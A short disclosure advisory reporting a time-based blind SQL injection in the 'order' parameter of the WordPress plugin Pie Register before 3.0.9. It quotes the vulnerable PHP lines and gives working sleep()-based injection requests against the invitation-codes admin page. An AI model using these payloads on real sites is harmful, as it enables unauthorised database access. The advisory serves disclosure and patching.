WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
This bug was found using the portal in the files: /pie-register/classes/invitation_code_pagination.php: if ( isset( $_GET['order'] ) && $_GET['order'] ) /pie-register/classes/invitation_code_pagination.php: $order = $_GET['order']; And when the query is executed, the parameter "order" it is not sanitized. /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order ); The following URL have been confirmed to all suffer from Time Based SQL Injection. GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1(2 seconds of response) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1(30 seconds of response)